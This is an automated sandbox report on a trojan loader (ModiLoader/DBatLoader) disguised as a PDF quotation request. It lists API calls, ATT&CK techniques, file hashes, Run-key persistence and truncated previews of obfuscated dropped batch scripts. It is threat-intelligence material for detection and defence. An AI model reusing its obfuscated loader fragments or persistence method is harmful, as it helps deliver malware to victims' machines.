                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_02955A78
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: GetLocaleInfoA,1_2_0295A798
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: GetLocaleInfoA,1_2_0295A74C
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_02955B84
                      Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02959194 GetLocalTime,1_2_02959194
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0295B714 GetVersionExA,1_2_0295B714
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match, File source: 12.2.kmtqwssC.pif.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 16.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 6.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 12.2.kmtqwssC.pif.400000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 16.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 6.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000C.00000002.1977379900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      Source: Yara match, File source: 12.2.kmtqwssC.pif.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 16.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 6.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 12.2.kmtqwssC.pif.400000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 16.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 6.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000C.00000002.1977379900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                      Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                      Execution: 1 Native API; 1 Shared Modules; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                      Persistence: 1 Valid Accounts; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                      Privilege Escalation: 1 Valid Accounts; 1 Access Token Manipulation; 411 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                      Defense Evasion: 11 Masquerading; 1 Valid Accounts; 1 Access Token Manipulation; 2 Virtualization/Sandbox Evasion; 411 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading
                      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                      Discovery: 1 System Time Discovery; 321 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 System Network Connections Discovery; 1 File and Directory Discovery; 35 System Information Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                      Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                      Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior graph (image not reproduced): Behavior Graph ID: 1580362, Sample: RTD20241038II Listed Parts ..., Startdate: 24/12/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | 66% | ReversingLabs | Win32.Trojan.ModiLoader |
RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\Public\Libraries\Csswqtmk.PIF | 100% | Joe Sandbox ML | |
C:\Users\Public\Libraries\Csswqtmk.PIF | 66% | ReversingLabs | Win32.Trojan.ModiLoader |
C:\Users\Public\Libraries\kmtqwssC.pif | 3% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://www.pmail.com0 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 172.217.19.238 | true | false | | high
drive.usercontent.google.com | 142.250.181.1 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif | false | | high
https://drive.usercontent.google.com/ | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | false | | high
https://sectigo.com/CPS0 | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif | false | | high
http://ocsp.sectigo.com0 | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif | false | | high
https://drive.google.com/ | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | false | | high
http://ocsp.sectigo.com0C | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif | false | | high
http://www.pmail.com0 | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif, kmtqwssC.pif.1.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
172.217.19.238 | drive.google.com | United States | | 15169 | GOOGLEUS | false
142.250.181.1 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1580362
                                            Start date and time:2024-12-24 11:27:45 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:20
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@21/7@2/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 61
                                            • Number of non-executed functions: 266
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes were analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
Time | Type | Description
05:28:39 | API Interceptor | 2x Sleep call for process: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe modified
05:29:02 | API Interceptor | 4x Sleep call for process: Csswqtmk.PIF modified
05:29:23 | API Interceptor | 9x Sleep call for process: kmtqwssC.pif modified
11:28:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Csswqtmk C:\Users\Public\Csswqtmk.url
11:29:02 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Csswqtmk C:\Users\Public\Csswqtmk.url
                                            No context
                                            No context
                                            No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | fnCae9FQhg.exe | | malicious | LummaC | | 142.250.181.1, 172.217.19.238
 | bG89JAQXz2.exe | | malicious | LummaC | | 142.250.181.1, 172.217.19.238
 | SFtDA07UDr.exe | | malicious | LummaC | | 142.250.181.1, 172.217.19.238
 | 3zg6i6Zu1u.exe | | malicious | LummaC | | 142.250.181.1, 172.217.19.238
 | oiF7u78bY2.exe | | malicious | LummaC | | 142.250.181.1, 172.217.19.238
 | L5Kgf2Tvkc.exe | | malicious | LummaC | | 142.250.181.1, 172.217.19.238
 | LVDdWBGnVE.exe | | malicious | LummaC Stealer | | 142.250.181.1, 172.217.19.238
 | O5Vg1CJsxN.exe | | malicious | LummaC, Stealc | | 142.250.181.1, 172.217.19.238
 | 2oM46LNCOo.exe | | malicious | LummaC | | 142.250.181.1, 172.217.19.238
 | J18uCKmoAw.exe | | malicious | LummaC | | 142.250.181.1, 172.217.19.238
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\Public\Libraries\kmtqwssC.pif | Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe | | malicious | DBatLoader, FormBook | |
 | F.O Pump Istek,Docx.bat | | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | |
 | D.G Governor Istek,Docx.exe | | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | |
 | qDKTsL1y44.exe | | malicious | DBatLoader | |
 | PRODUCT.bat | | malicious | AveMaria, DBatLoader, UACMe | |
 | purchaseorder.bat | | malicious | AveMaria, DBatLoader, UACMe | |
 | PO11550.exe | | malicious | AveMaria, DBatLoader, UACMe | |
 | SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe | | malicious | AgentTesla, DBatLoader, RedLine | |
 | PCMNil7wkU.exe | | malicious | AgentTesla, AsyncRAT, DBatLoader, RedLine | |
 | tTIYCp2sf4.exe | | malicious | Remcos, DBatLoader | |
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Csswqtmk.PIF">), ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):104
                                                                Entropy (8bit):5.148515771830924
                                                                Encrypted:false
                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMb1kmjHovsbxAQRVbb:HRYFVmTWDyzI1xyExAEVbb
                                                                MD5:B2CA6E15D33A74F5E9D62C00D9E84429
                                                                SHA1:9593875EBC01527058A10DF88A308235EB5970F1
                                                                SHA-256:07A12EAB40B8471728CC9C6A706B94D6448D43C080B98A551D33A9A2A9E0F3A7
                                                                SHA-512:BFFE6254D4EE0470AA266B5B92CC6CEEA928254A341AC10BF544888147886B286C8E22871F7C74AA018DCD8D47EA7F3BB0ED67F278B33FA763E677B1D57C7DD1
                                                                Malicious:true
                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Csswqtmk.PIF"..IconIndex=950540..HotKey=58..
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):15789
                                                                Entropy (8bit):4.658965888116939
                                                                Encrypted:false
                                                                SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                Malicious:false
                                                                Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):615455
                                                                Entropy (8bit):7.387292819052727
                                                                Encrypted:false
                                                                SSDEEP:12288:TUVIMK/uSLZ963Xf4tTF3iAdjOeD/BIMn0h8OYRBl3VjUcSxxi1nHW8:TUGMK2UIqTFSAUebt0fYXvjUtxs1nZ
                                                                MD5:454418FC0A479F060549F4211A41CD5A
                                                                SHA1:3455DA697CA2B9E8B74A0A4BF3A4744F8209B14A
                                                                SHA-256:7F57C911C458D6B2E08C6C568FF81917574CD5A56233CA69296A53DC7F1D1420
                                                                SHA-512:75DDBDF1B40CF19F6B3199A649D0E14745EB20E95C371A65244A6C75C23DFC9C5660570A597109FFB44C1C9C6AACAF3119A339EAC1FCD1D90248F7245D35D586
                                                                Malicious:true
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1525248
                                                                Entropy (8bit):7.156307736710648
                                                                Encrypted:false
                                                                SSDEEP:24576:ybzkvy/WQ9JGhRg8MLr12geV421wu0L8UnE923HZshmMv6J:ybzgZh+HV21W8UE923HZrs6
                                                                MD5:AACA1B72E0AC5DC118B0F981667E8179
                                                                SHA1:162A85D0D2D6EEC0FB05D043167BBD8451183735
                                                                SHA-256:8A63BBD795519E52538E95891F205D78A4CCC474C24E80D8EFAB364AD4CA2335
                                                                SHA-512:B066F98AA3FF546753E6AC2CC76918AB90B46859ECADB7B1940BF562EDBB389383F2A09146B71863073C3434A408DAF5FA93968603011D647EDE2AA9C9E13426
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................J......d.............@..............................................@...............................+...P..........................xy...................................................................................text...|........................... ..`.itext.............................. ..`.data............ ..................@....bss.....I...0...........................idata...+.......,..................@....tls....4............H...................rdata...............H..............@..@.reloc..xy.......z...J..............@..B.rsrc........P......................@..@.....................F..............@..@................................................................................................
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):8556
                                                                Entropy (8bit):4.623706637784657
                                                                Encrypted:false
                                                                SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                MD5:60CD0BE570DECD49E4798554639A05AE
                                                                SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                Malicious:true
                                                                Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):46543
                                                                Entropy (8bit):4.705001079878445
                                                                Encrypted:false
                                                                SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                MD5:637A66953F03B084808934ED7DF7192F
                                                                SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                Malicious:false
                                                                Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):175800
                                                                Entropy (8bit):6.631791793070417
                                                                Encrypted:false
                                                                SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                Joe Sandbox View:
                                                                • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse
                                                                • Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse
                                                                • Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse
                                                                • Filename: qDKTsL1y44.exe, Detection: malicious, Browse
                                                                • Filename: PRODUCT.bat, Detection: malicious, Browse
                                                                • Filename: purchaseorder.bat, Detection: malicious, Browse
                                                                • Filename: PO11550.exe, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse
                                                                • Filename: PCMNil7wkU.exe, Detection: malicious, Browse
                                                                • Filename: tTIYCp2sf4.exe, Detection: malicious, Browse
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.156307736710648
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 93.60%
                                                                • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                • Windows Screen Saver (13104/52) 0.12%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                File name:RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File size:1'525'248 bytes
                                                                MD5:aaca1b72e0ac5dc118b0f981667e8179
                                                                SHA1:162a85d0d2d6eec0fb05d043167bbd8451183735
                                                                SHA256:8a63bbd795519e52538e95891f205d78a4ccc474c24e80d8efab364ad4ca2335
                                                                SHA512:b066f98aa3ff546753e6ac2cc76918ab90b46859ecadb7b1940bf562edbb389383f2a09146b71863073c3434a408daf5fa93968603011d647ede2aa9c9e13426
                                                                SSDEEP:24576:ybzkvy/WQ9JGhRg8MLr12geV421wu0L8UnE923HZshmMv6J:ybzgZh+HV21W8UE923HZrs6
                                                                TLSH:36658BA1D65383E1D27A18743F0B32F9E82C3C2CAA70948D6FDC593AD621952EC37536
                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                Icon Hash:1b2b4380030b8b4b
                                                                Entrypoint:0x470764
                                                                Entrypoint Section:.itext
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                DLL Characteristics:
                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:22bd506e939ff48fc3f7134a63d5ffe7
                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                add esp, FFFFFFF0h
                                                                mov eax, 0046FD24h
                                                                call 00007F3070C9C5EDh
                                                                mov eax, dword ptr [00472C70h]
                                                                mov eax, dword ptr [eax]
                                                                call 00007F3070CF01E9h
                                                                mov ecx, dword ptr [00472D6Ch]
                                                                mov eax, dword ptr [00472C70h]
                                                                mov eax, dword ptr [eax]
                                                                mov edx, dword ptr [0046FAB0h]
                                                                call 00007F3070CF01E9h
                                                                mov ecx, dword ptr [00472DACh]
                                                                mov eax, dword ptr [00472C70h]
                                                                mov eax, dword ptr [eax]
                                                                mov edx, dword ptr [0046D670h]
                                                                call 00007F3070CF01D1h
                                                                mov eax, dword ptr [00472C70h]
                                                                mov eax, dword ptr [eax]
                                                                call 00007F3070CF0245h
                                                                call 00007F3070C9A680h
                                                                lea eax, dword ptr [eax+00h]
                                                                add byte ptr [eax], al
                                                                Name | Virtual Address | Virtual Size | Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x78000 | 0x2b9e | .idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x85000 | 0xf8200 | .rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7d000 | 0x7978 | .reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x7c000 | 0x18 | .rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x78818 | 0x6c4 | .idata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
